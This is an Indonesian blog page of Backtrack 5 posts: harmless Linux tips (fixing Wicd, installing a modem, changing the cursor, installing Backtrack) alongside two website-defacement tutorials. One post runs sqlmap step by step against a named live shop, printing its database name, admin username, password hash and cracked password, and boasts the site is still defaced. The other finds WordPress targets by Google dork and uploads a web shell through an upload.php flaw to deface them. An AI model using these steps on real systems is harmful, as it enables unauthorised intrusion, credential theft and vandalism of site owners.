Showing posts with label Backtrack. Show all posts
Showing posts with label Backtrack. Show all posts
Monday 24 February 2014

Memperbaiki Wcid Network Manager Eror[ Backtrack 5 ]

1 comments
Assalamuallaikum sobat IDCA - Udah jarang nih update soal OS Backtrack, sekarang kembali lagi kita ulas mengenai Naga ini haha :D

Kali ini akan admin bagikan trik simple cara memperbaiki Wcid yang eror, oke langsung saja simak tutorial berikut ini :



Tekan CTRL + ALT + T [ Terminal Open ]

Lalu jalankan command berikut ini :


root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults
root@bt:~# reboot
Setelah reboot cek Wcidnya, masih eror engak?
Sekian tutorial yang dapat admin berikan.
Trimakasih!

Author : Bimo Septiawan


Continue reading →
Wednesday 8 May 2013

Cara Install Modem Smartfren AC692 di Backtrack 5 R3

0 comments

Assalamualaikum...


Neh ane sekedar mau share aja cara install modem Smartfren AC692UI di Backtrack 5 R3.. Sebenarnya cukup mudah kok :D Pertama Copy dulu isi modemnya dari windows, lalu simpan di folder root (home), kemudian kita jalankan perintahnya melalui terminal.

kita masuk ke folder yg berisikan file data dari modem smartfren tadi,,
command:    cd smart


lalu kita ubah dulu permissionnya: chmod +x autorun.sh


kemudian jalankan file autorun.sh : ./autorun.sh


Setelah itu tinggal colokin modemnya dan jalankan modem GUInya, sobat bisa lihat di Aplication>Internet>Modem Smartfren AC692UI :)



Tarraaa,, modem telah terinstall, selamat bersenang2 moga bermanfaat :)

Content creator : Onix AQua

Continue reading →
Wednesday 1 May 2013

Install Linux Backtrack 5 R3

0 comments

Assalamualaikum...

Salam ya sobat, makin rajin nih blogging nya, wkwkkwk :D kali ini agak berbeda pembahasannya, sekedar selingan aja :D bosen ah Depes2 terus :D oke langsung dah, ane mau sedikit memberikan tutorial cara install backtrack :D kagak susah2 amat, yang penting punya tekad buat belajar aja :D

Bahan - Bahan :

1. Backtrack 5 R3 | Download

2. Roti, Susu, ma Sesajen, :D


Pertama, masukkan DVD ke komputer sobat kemudian Booting sehinngga tampil gambar seperti di bawah ini.


Setelah proses boot selesai maka akan tampil gambar seperti dibawah ini dan sobat pilih "Backtrack Text - Default Boot Text Mode"


Lalu Sobat tunggu hingga tampil seperti gambar di bawah ini, kemudian ketik "startx" untuk masuk ke mode GUI backtrack! 


Kemudian klik pada ikon "Install Backtrack" di desktop






Kemudian pilih bahasa yang sobat iniginkan kemudian klik forward







Pilih kota dimana sobat berada dengan mengklik pada peta kmeudin klik forward..


Lalu klik forward lagi, kecuali sobat ingin mengganti keyboard layout


Selanjutnya kalo sebelumnya sobat udah pake Windows, tinggal pilih aja "Install them side by side choosing between them each startup" kemudian klik forward!!




Setelah itu klik Install



Setelah mengklik 'Install" maka akan tampil proses instalasi sobat tinggal tunggu proses instalasi hingga selesai,:D


Setelah proses instalasi telah selesai, silahkan restart komputer sobat. dan selamat berexplorasi dengan Backtrack... udah gitu aja yah, kalo ga ngerti silahkan komentar aja :D


Wassalam..

Content Creator : Onix AQua


Continue reading →
Tuesday 30 April 2013

Mengganti Cursor di Backtrack 5

0 comments
Selamat sore teman teman IDCA :D
Oke sesuai judul, ane mau bagi trik yang ane dapet hasil dari searching nih, langsung aja yah ..

Monggo disimak, yang make Windows jangan iri yaaaaa, cos ini cuma buat yang make backtrack aja :D :D :P

1. Buka terminal/console dulu om, lalu masukan perintah :
apt-get install oxygen-cursor-theme-extra


2. Tunggu proses sampek selesai, kalau sudah tinggal dibuka deh :
Klik kanan -> Change Desktop Background -> Theme -> Costumizer -> Pointer





Nah keren kan XD XD , selamat mencoba :)

Refrensi : disini

Content Creator : Bimo Septiawan
Continue reading →
Wednesday 24 April 2013

Deface Dengan SQLMAP di Backtrack 5

0 comments
Assalamualaikum Wr, WB,

maaf yah om om sekalian, ane lama gak buat threat baru, nah sekarang mumpung ada waktu ane share nih cara deface website dengan SQLMAP di Backtrack 5 :D

Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+} BAHAN [+]

  • Python | Available on Backtrack
  • Sqlmap | Available on Backtrack
[+] LANGKAHNYA MAS BRO [+]

(*Untuk Windows kalian cari dulu ke sini )

1. Kita cari dulu target yang mau kita scan (*jika ada bugs akan seperti ini)



2. Buka dulu SQLMAPnya, kalo di Backtrack 5 ketikan printah
  • cd /pentest/web/scanners/sqlmap /

3. Ketikan printah ini :
  • python sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs

setelah itu klik enter, maka akan muncul Database Target (*See Image)



4. Setelah dapet nama Data Basenya kita ketikan printah :
  • python sqlmap.py -u http://TARGET.com -D nama_database -tables

Contoh target saya : python ./sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables  [tekan enter] hasil :



5. Setelah dapat table pada databasenya silahkan cari table yang menurut kalian ada USER + PASS website tersebut, kali ini saya coba scan TABLE USER, dengan perintah :
  • python sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns [lalu tekan ENTER] maka hasilnya akan seperti ini :

6. Setelah itu kita scan lagi table itu untuk mendapatkan user dan pass admin website, dengan perintah :
  • python sqlmap.py -u http://www.target.com -D nama_database -T table --dump
Contoh Punya Saya : python ./sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump [tekan ENTER]

Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip"

  • do you want to crack them via a dictionary-based attack? [Y/n/q] maka hasilnya :



nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya caranya pergi ke :


Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D


HASIL : 

masih kena deface tuh : http://www.vana-shop.com/

dah yah sekian dulu Postingnya, ane males ngetik lagi KWOKWOWK XD

Semoga berhasil :)

Content Creator : Bimo Septiawan a.k.a Cyber404




Continue reading →
Sunday 31 March 2013

Cara Mudah Deface Dengan Remote Shell Upload Vulnerability | Backtrack

0 comments

Assalamualaikum...

Salam Sejahtera bagi kita semua,,,

Okey sobat IDCA, masih bersama ane admin terbaik sejagad,, hajiahh :D yup, kali ini saatnya berbagi lagi... daripada ga ada kerjaan, mending bagi bagi ilmu aja :D

Pada tutorial ini sama dengan CSRF, cuma sedikit berbeda caranya saja, disini ane gunain OS Backtrack, ane udah coba pake Windows, tapi ribet!! >.< Silahkan sobatcoba2 aja gunain Windows OS, tapi kalo ada masalah nantinya  silahkan di solving sendiri yah.. wokwokwok :D

Bahan - Bahan :

1. Script Upload.php | Download Password: Lihat

2. Google Dork: inurl:"/wp-content/themes/Brainstorm/"
 #Silahkan Dork dikembangkan lagi 

3. Live Target : Lihat1 & Lihat2

4. Install PHP5-Curl | Lihat disini

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah - Langkah :

1. Pertama cari dulu target dengan menggunakan Dork..



2. Disini ane udah nemuin targetnya.. dan langsung aja cari upload.php nya



Penting! Kalo halaman menjadi kosong, ada kemungkinan exploit bisa dijalankan!

3. Sebelumnya letakkan file Uploadify.php dan Shell sobat di folder /var/www/


4. Lalu edit dulu Uploadify.php dengan Notepad, silahkan dirubah yg ane kasi tanda panah seperti Link target, nama file dan folder! Lalu Save kembali..


5. Selanjutnya Buka terminal dan jalankan Apache dengan ketikkan perintah: /etc/init.d/apache2 start lalu enter!



6. Kemudian ketik perintah berikut diterminal : cd /var/www/ lalu enter!! lalu ketik lagi perintah: php uploadify.php lalu enter! dan silahkan sobat tunggu hasilnya!

7. nah tuh, shell telah berhasil diupload ke web,, selanjutnya tinggal eksekusi shell dan Tebas index web.. wokwokwok :D

Note: Ga semua hasilnya sama begitu,, kalo ga nampil seperti gambar, silahkan sobat cari dimana letak shell sobat :D

Good Luck!!!!! :p

Content Created By Onix AQua


Continue reading →